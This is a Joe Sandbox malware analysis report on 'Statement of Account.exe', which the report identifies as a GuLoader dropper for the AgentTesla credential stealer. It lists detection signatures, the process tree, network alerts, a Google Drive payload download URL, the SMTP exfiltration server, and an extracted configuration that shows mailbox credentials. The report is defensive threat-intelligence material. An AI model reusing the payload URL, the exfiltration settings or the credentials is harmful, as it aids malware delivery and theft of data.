Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Statement of Account.exe

Overview

General Information

Sample Name:Statement of Account.exe
Analysis ID:1640
MD5:1232806812f946a2afabc5f5fe489de5
SHA1:f9a820627667403e90b3a387de0b644f8f0ddc31
SHA256:86907475c81bc4700fc465c758592c51e905feed8aecdc0c10ccb6a8c650218a
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
GuLoader behavior detected
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Statement of Account.exe (PID: 2204 cmdline: 'C:\Users\user\Desktop\Statement of Account.exe' MD5: 1232806812F946A2AFABC5F5FE489DE5)
    • RegAsm.exe (PID: 3428 cmdline: 'C:\Users\user\Desktop\Statement of Account.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • DnDcR.exe (PID: 1820 cmdline: 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • DnDcR.exe (PID: 3484 cmdline: 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 3088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "hemant@friendsequipment.com2018@hemantmail.friendsequipment.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.47854626661.0000000002260000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 3428JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 3428JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 65.60.11.90, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 3428, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49821

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: conhost.exe.3088.17.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "hemant@friendsequipment.com2018@hemantmail.friendsequipment.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: Statement of Account.exeReversingLabs: Detection: 23%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D32DA50 CryptUnprotectData,9_2_1D32DA50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D32E0FB CryptUnprotectData,9_2_1D32E0FB
            Source: Statement of Account.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49809 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49810 version: TLS 1.2
            Source: Binary string: RegAsm.pdb source: DnDcR.exe, DnDcR.exe.9.dr
            Source: Binary string: RegAsm.pdb4 source: DnDcR.exe, 0000000E.00000002.48160223360.0000000000142000.00000002.00020000.sdmp, DnDcR.exe, 00000010.00000002.48240148335.00000000000D2000.00000002.00020000.sdmp, DnDcR.exe.9.dr
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403248
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edi, edi1_2_00403248
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403248
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403248
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then sub ecx, F6DD248Dh1_2_0040225E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040225E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edi, edi1_2_0040225E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040225E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040225E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edi, edi1_2_0040346B
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040346B
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040346B
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403611
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403611
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403827
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edi, edi1_2_004032D4
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004032D4
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004032D4
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403697
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403697
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004038AC
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edi, edi1_2_0040336A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040336A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040336A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040371F
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040371F
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004039C9
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edi, edi1_2_004033EA
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004033EA
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004033EA
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403581
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403581
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403586
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403586
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403588
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403588
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040358A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040358A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040358C
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040358C
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040358E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040358E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403590
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403590
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403592
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403592
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403596
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403596
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403598
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403598
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040359A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040359A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040359C
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040359C
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040359E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040359E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004035A0
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004035A0
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004035A2
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004035A2
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004035A4
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004035A4
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004035A6
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004035A6
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004035A8
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004035A8
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004035AA
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004035AA
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004031BE
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edi, edi1_2_004031BE
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004031BE
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004031BE

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49821 -> 65.60.11.90:587
            Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l5g2k8pionitvg39ebi65v2bf/1634128725000/08714151441044389622/*/1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-4k-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49821 -> 65.60.11.90:587
            Source: global trafficTCP traffic: 192.168.11.20:49821 -> 65.60.11.90:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 00000009.00000002.52067274835.000000001E46F000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52067893875.000000001E4E8000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000003.48737845239.000000001D071000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpString found in binary or memory: http://LUDB17WCKZR.org
            Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpString found in binary or memory: http://VpGUaC.com
            Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmpString found in binary or memory: http://friendsequipment.com
            Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmpString found in binary or memory: http://mail.friendsequipment.com
            Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%4
            Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
            Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/
            Source: RegAsm.exe, 00000009.00000003.47831098250.000000000165E000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/%%doc-0g-4k-docs.googleusercontent.com
            Source: RegAsm.exe, 00000009.00000002.52056100424.000000000162E000.00000004.00000020.sdmpString found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/4
            Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52056281072.000000000164E000.00000004.00000020.sdmpString found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l
            Source: RegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/Q
            Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh
            Source: RegAsm.exe, 00000009.00000002.52066831984.000000001E412000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: RegAsm.exe, 00000009.00000002.52066831984.000000001E412000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l5g2k8pionitvg39ebi65v2bf/1634128725000/08714151441044389622/*/1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-4k-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49809 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49810 version: TLS 1.2

            Spam, unwanted Advertisements and Ransom Demands:

            barindex
            Modifies the hosts fileShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

            System Summary:

            barindex
            Potential malicious icon foundShow sources
            Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
            Source: Statement of Account.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004018681_2_00401868
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004032481_2_00403248
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_0040225E1_2_0040225E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_0040346B1_2_0040346B
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004036111_2_00403611
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004032D41_2_004032D4
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_0040336A1_2_0040336A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004033EA1_2_004033EA
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004035901_2_00403590
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004031BE1_2_004031BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_012811309_2_01281130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_012843209_2_01284320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_01283A509_2_01283A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0128D4909_2_0128D490
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0128C7309_2_0128C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_012837089_2_01283708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_012915F09_2_012915F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_01296F109_2_01296F10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133B3889_2_0133B388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133ED489_2_0133ED48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_013394BF9_2_013394BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133BEF89_2_0133BEF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133B9B29_2_0133B9B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133D1AE9_2_0133D1AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133D1FA9_2_0133D1FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133B9EA9_2_0133B9EA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133D3AF9_2_0133D3AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_013332829_2_01333282
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133D2D29_2_0133D2D2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_013337D89_2_013337D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D32A9289_2_1D32A928
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D32B1709_2_1D32B170
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D3224809_2_1D322480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D325E289_2_1D325E28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D32F1309_2_1D32F130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D323DB89_2_1D323DB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D32B0709_2_1D32B070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B49E89_2_1D7B49E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B78E09_2_1D7B78E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B0BD09_2_1D7B0BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B00409_2_1D7B0040
